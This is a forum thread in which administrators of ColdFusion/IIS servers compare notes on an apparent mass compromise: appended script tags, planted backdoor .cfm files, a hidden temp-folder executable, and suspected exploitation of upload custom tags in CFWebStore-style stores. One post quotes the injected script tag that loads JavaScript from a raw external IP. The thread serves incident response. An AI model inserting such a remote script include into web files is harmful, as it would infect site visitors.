Malicious Code on Website

Hello, I have experienced the same issue. I thought I had this licked by attempting to clean all of the infected .js, .htm and other file that had the script attached to them. We just reloaded several sites, and are now finding that the stuff is coming back. Is the source of the mal ware on the server? Or in a database? Or does just running a single page with the script initiate the malware spreading again?

I've been seeing this as well and have a little more info. I'm still verifying but hopfully, working together, we can flesh this thing out:

The issue that I'm seeing is NOT a SQL Injection attack. It's appending the malicious code to .htm, .html, application.cfm, .js (this is what I found so far).

This looks like a blind attack (doesn't know what files reside on server).

I'm seeing this on a server that's running Server 2008 running IIS7 and ColdFusion. I'm investigating a form that allowed for a user to have the ability to upload a document with a mime type of application/octetstream (i.e. exe). The directory it was uploaded to allowed for execute permissions (not good).

Here's the serious part. It's uploaded (I think) a .exe (prefix is a random numeric number) and looks to be hidden via a root kit.

TrendMicro picked it up as Cryp_Xin1.

Again, I'm still not definitely sure how this thing was put up on the server (via Form Submission, ColdFusion or FTP). I'm pretty sure it wasn't ftp since I check my logs and didn't see anything out of the norm here.

If anyone else has some additional information to share (OS/application configuration, good root kit discovery / removal software, etc.) it would be greatly appreciated!

<script src=http://222.231.60.19/seraph/door/iisHelp/help.js></script>

                                              

1:

Thanks. More for the gristmill... We are on Hosting.com servers, (just
bought by HMS), and the server affected most severely is a dedicated CF7. All
.js files, .htm, .asp and some application.cfm files have a javascript appended
(...seraph/door/...etc). Also, there are two file being added to the
/images/accounts/dir: image.cfm and index.cfm...both of these files have some
ugly code that appears to allow access by user seraph, and grants access to
virtual servers, upload, etc.

We have tried removing the included trash that is being added to the files, but
as soon as the files are reloaded and the pages begin serving again, the sites
become infected. Right now, we have pulled the plug on two servers, and stopped
all sites. Bad day on the mid-way.

Furthermore, the CF8 server we have is not showing signs files being appended,
but the server logs do show activity from seraph running post on
customtags/uploadfile.cfm. Finally, we also see at about the same time, morpheus
(bleep) scanner at work.

At present, Hosting.com is being very nice, but has little in the way of advice.
If anyone has further advice, we could definitely use it.

Thanks in advance...

Thanks Breedworks...I'm going to check this out...

More quick info....

Ok...I was able to isolate the file that was being executed (while it was executing). It was executing via c:\windows\temp\randomprefix.exe

Filesize is 44kb. It's accessing C:\inetpub\AdminScripts\adsutil.vbs (I removed this).

Anybody else seeing this. I'll continue to investigate

Thanks citadelnet,

Is see two files in our CF7 server's temp dir, 44k exes, with random file names. I am assuming that your removed your versions?

This is a message post from another forum, and appears to be related.
...I fought this last week on my dedicated server running Win Server 2003, IIS 6
and Cold Fusion 7. All patches were in place. Symantec End Point Protection
finally solved my problems after it removed a Trojan Horse hidden in the
Recycler Folder. I'm still not positive how the initial files got in but I was
suspecting a vulnerability in ISS 6 but I could be a Cold Fusion 7 issue as
well.

Once the trojan was removed from my Recycler folder my problems stopped. Before
that was found I manually removed a rogue service that was installed and could
not be stopped. It was called xatoov but appeared to have a randomly generated
name. In the Services control panel I was unable to stop the service or make any
configuration changes. Other virus scans I attempted did not find the trojan in
my Recycler folder.

Hello Breedworks...I'v been going through the image.cfm and the index.cfm...very nasty.

Part of the code that I'm seeing is that he's trying to disable scriptprotect on application.cfm files. I'm wondering if this has bunged up my ColdFusion administrator (since it's encrypted)

Did you happen to check your ColdFusion administrator...is it still operational?

I'm getting a "this does not appear to be a valid class byte array" error.

Hmm, I had IIS turned off. i have just now removed the offending .exes and tried to restart IIS. First time failed, but second time it started. I then tried to access the CF admin and I too, am getting the "this does not appear to be a valid class byte array" error.

My host has just now recommended trashing the server, and starting from "clean" files. Ugh....from what you know, do you think that is is possible to clean the website's files of all the javascript, remove those image and index.cfm files, and then reload these files? And what about the DBs. we're using access files for most of the sites. Can they be trusted?

Thanks

Hi citadelnet, Are you using CFWebStore?

Hi Breedworks,

I would have to say yes to that. It actually based on code we purchased from the original developer which is fundamentally the same architecture as CFWebstore.

Ok, this is part os post on another group...from the author.

so far, I see two things that should be done, particularly on older stores. It would be best to check any site, just to be safe.

1. Remove upload.cfm, uploadfile.cfm and upload_thumbnails.cfm from the customtags directory

2. Comment out or remove the setting for the company logo around line 114 of users/dsp_account_form.cfm